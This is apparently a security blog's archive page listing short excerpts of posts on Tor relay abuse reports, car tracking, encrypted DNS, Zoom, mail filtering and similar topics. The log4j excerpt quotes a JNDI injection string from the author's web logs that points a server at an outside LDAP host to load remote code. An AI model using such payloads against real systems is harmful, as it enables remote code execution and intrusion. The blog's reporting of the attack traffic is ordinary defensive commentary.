This email just in from the tor project team. From: gus To: tor-relays@lists.torproject.org Subject: [tor-relays] Update: Tor relays source IPs spoofed to mass-scan port 22 Date: Thu, 7 Nov 2024 15:49:37 -0300 Hello everyone, I’m writing to share that the origin of the spoofed packets has been identified and successfully shut down today, thanks to …
Category: network (in)security
Permanent link to this article: https://baldric.net/2024/11/07/spoof-source-identified/
Nov 06 2024
watchdogcyberdefense.com are complete bozos
And may even be malicious. I have been receiving “malicious activity” reports from my hosting ISP about my Tor node at “tor1.rlogin.net” since about the end of October. So far I have received five such reports. Each report takes the following form: We have received an abuse report from abuse@watchdogcyberdefense.com for your IP address 95.216.198.252. …
Permanent link to this article: https://baldric.net/2024/11/06/watchdogcyberdefense-com-are-complete-bozos/
Feb 19 2023
lost car
Last month I posted an article about the press reports of chinese software and hardware “found” in cars and how that could lead to the cars being tracked by the chinese state (or other hostile agencies). I was therefore delighted to see the cartoon below in issue 1591 of Private eye. I am indebted to …
Permanent link to this article: https://baldric.net/2023/02/19/lost-car/
Jan 16 2023
mobile (in)security
In my last post, an ex GCHQ staffer is quoted as saying: “If you’re stepping back a bit and saying what cars do park outside GCHQ or somewhere like Porton Down then you have the pool of information there if you ever need it.” which got me wondering about how secure existing protective measures around …
Permanent link to this article: https://baldric.net/2023/01/16/mobile-insecurity/
Jan 16 2023
brakes-as-a-service
Some parts of the UK press have been reporting recently on the “discovery” of “hidden Chinese tracking devices” in a UK Government car (the original inews report is behind a paywall). The reports quote a “serving member of the British intelligence community” as telling the i newspaper: “It [the tracking SIM] gives the ability to survey …
Permanent link to this article: https://baldric.net/2023/01/16/brakes-as-a-service/
Dec 30 2022
signal failure
I use signal as my instant messenger app on my ‘phone and I have the desktop version installed on my, well, desktop. Signal was written by the kind of people I trust and in my view it is infinitely better than plain unencrypted SMS and much better than any of the alternative IMs around (whatsapp, …
Permanent link to this article: https://baldric.net/2022/12/30/signal-failure/
Dec 17 2021
log4j
I guess that there are a lot of busy sysadmins around at the moment. My web logs are full of crud like: “GET /$%7Bjndi:ldap://123.345.567:789/Exploit%7D” and much lengthier entries trying to exploit the log4j vulnerability. In my case (and for this instance) I’m not that bothered because, luckily, I don’t run Apache, or any of its …
Permanent link to this article: https://baldric.net/2021/12/17/log4j/
Oct 15 2021
zuck off facebook
Or how to block the entire Facebook network. In my last post on Facebook’s misfortunes I mentioned that my wife initially blamed me, assuming it was just local and that I had made some new change to my local network configuration. Now whilst I do actually bin some of Facebook’s more annoying subdomains (such as …
Permanent link to this article: https://baldric.net/2021/10/15/zuck-off-facebook/
May 27 2021
nothing to hide, nothing to fear
I recently came across this rather nice (spoof) NSA site describing the work of the Agency’s “Domestic Surveillance Directorate”. That Directorate supposedly exists to protect the citizen from the usual suspects (terrorists, paedophiles, criminals) and is tasked with data collection and analysis to support that end. The site says: “Our value is founded on a …
Permanent link to this article: https://baldric.net/2021/05/27/nothing-to-hide-nothing-to-fear/
Apr 29 2021
RIP Dan Kaminsky
I learned today that Dan Kaminsky died on Friday 23 April of complications arising from his diabetes. (I would probably have learned earlier if I followed twitter, but I don’t.) He was only 42. I met Kaminsky at an MSRC Bluehat Forum in 2009. He was only 30 at the time, but already widely respected, …
Permanent link to this article: https://baldric.net/2021/04/29/rip-dan-kaminsky/
Nov 15 2020
comment spam irony
I am very careful about how, or even if, I allow comments on trivia. For example I disallow all comments on any post after a set period of time, I also refuse all comments until I have had time to read and thus moderate them. This cuts down on the type of rubbish often seen …
Permanent link to this article: https://baldric.net/2020/11/15/comment-spam-irony/
Jun 06 2020
encrypting DNS on android
My previous two posts discussed the need for encrypted DNS and then how to do it on a linux desktop. I do not have any Microsoft systems so I have no idea how to approach the problem if you use any form of Windows OS, nor do I have any Apple devices so I can’t …
Permanent link to this article: https://baldric.net/2020/06/06/encrypting-dns-on-android/
May 25 2020
encrypting DNS with dnsmasq and stubby
In my last post I explained that in order to better protect my privacy I wanted to move all my DNS requests from the existing system of clear text requests to one of encrypted requests. My existing system forwarded DNS requests from my internal dnsmasq caching servers to one of my (four) unbound resolvers and …
Permanent link to this article: https://baldric.net/2020/05/25/encrypting-dns-with-dnsmasq-and-stubby/
May 06 2020
encrypting DNS
Any casual reader of trivia will be aware that I care about my privacy and that I go to some lengths to maintain that privacy in the face of concerted attempts by ISPs, corporations, government agencies and others to subvert it. In particular I use personally managed OpenVPN servers at various locations to tunnel my …
Permanent link to this article: https://baldric.net/2020/05/06/encrypting-dns/
Apr 10 2020
zooming in on china
Since my previous post below, I have been reading up on Zoom as a company, its staffing and its worrying security (or rather lack of) track record. When I wrote the initial post I said that “Zoom is a US company funded almost entirely by venture capital. Its servers are US based.”. It appears that …
Permanent link to this article: https://baldric.net/2020/04/10/zooming-in-on-china/
Apr 03 2020
zooming in on cabinet
On Tuesday of this week, Boris Johnson tweeted a picture of what he called the UK’s “first ever digital Cabinet”. That picture (copy below) shows that the Cabinet meeting was held using Zoom – the sort of video conferencing software which is currently popular with business users forced to work at home during the Covid19 …
Permanent link to this article: https://baldric.net/2020/04/03/zooming-in-on-cabinet/
Mar 11 2020
beware the zombie apocalypse
Tom Scott is a young educational entertainer who publishes fairly regularly on youtube. Back in mid 2004, whilst still a linguistics student at York, he managed to upset both the Home Office and the Cabinet Office by publishing a Department of Vague Paranoia website spoofing the rather po faced official “Preparing for Emergencies” site. Tom’s …
Permanent link to this article: https://baldric.net/2020/03/11/beware-the-zombie-apocalypse/
Feb 27 2020
have I been pwned?
Well, I don’t think so. But for a while I was not entirely sure. Following the move last November of trivia from a VM on UK2’s datacentre in London to our new home on a faster VM on ITLDC’s network I have been making a variety of minor changes and doing some essential housework. One …
Permanent link to this article: https://baldric.net/2020/02/27/have-i-been-pwned/
Jan 22 2020
TLS certificate checks
My move of trivia to a new VM last December prompted me to look again at my server configuration. In particular I wanted to ensure that I was properly redirecting all HTTP requests to HTTPS and that the ciphers and protocols I support are as up to date and strong as possible. Mozilla offers a …
Permanent link to this article: https://baldric.net/2020/01/22/tls-certificate-checks/
Jul 07 2019
openvpn clients on pfsense
In my 2017 article on using OpenVPN on a SOHO router I said: “In testing, I’ve found that using a standard OpenVPN setup (using UDP as the transport) has only a negligible impact on my network usage – certainly much less than using Tor.” That was true back then but is unfortunately not so true …
Permanent link to this article: https://baldric.net/2019/07/07/openvpn-clients-on-pfsense/
Jun 26 2019
one unbound and you are free
I have written about my use of OpenVPN in several posts in the past, most latterly in May 2017 in my note about the Investigatory Powers (IP) Bill. In that post I noted that all the major ISPs would be expected to log all their customers’ internet connectivity and to retain such logs for so …
Permanent link to this article: https://baldric.net/2019/06/26/one-unbound-and-you-are-free/
Feb 16 2019
postfix sender restrictions – job NOT done
OK, I admit to being dumb. I got another scam email yesterday of the same formulation as the earlier ones (mail From: me@mydomain, To: me@mydomain) attempting to extort bitcoin from me. How? What had I missed this time? Well, this was slightly different. Checking the mail headers (and my logs) showed that the email had …
Permanent link to this article: https://baldric.net/2019/02/16/postfix-sender-restrictions-job-not-done/
Jan 24 2019
postfix sender restrictions
I mentioned in my previous post that I had recently received one of those scam emails designed to make the recipient think that their account has been compromised in some way and that, furthermore, that compromise has led to malware being installed which has spied on the user’s supposed porn habits. The email then attempts …
Permanent link to this article: https://baldric.net/2019/01/24/postfix-sender-restrictions/
Dec 11 2018
well I never
It’s not often that I find myself agreeing with GCHQ, but ex GCHQ Director Robert Hannigan’s recent comments in an interview with the BBC Today programme struck a chord. Hannigan headed GCHQ from April 2014 until his resignation for family reasons last year. Whilst in post he pushed for greater transparency at the SIGINT agency. …
Permanent link to this article: https://baldric.net/2018/12/11/well-i-never/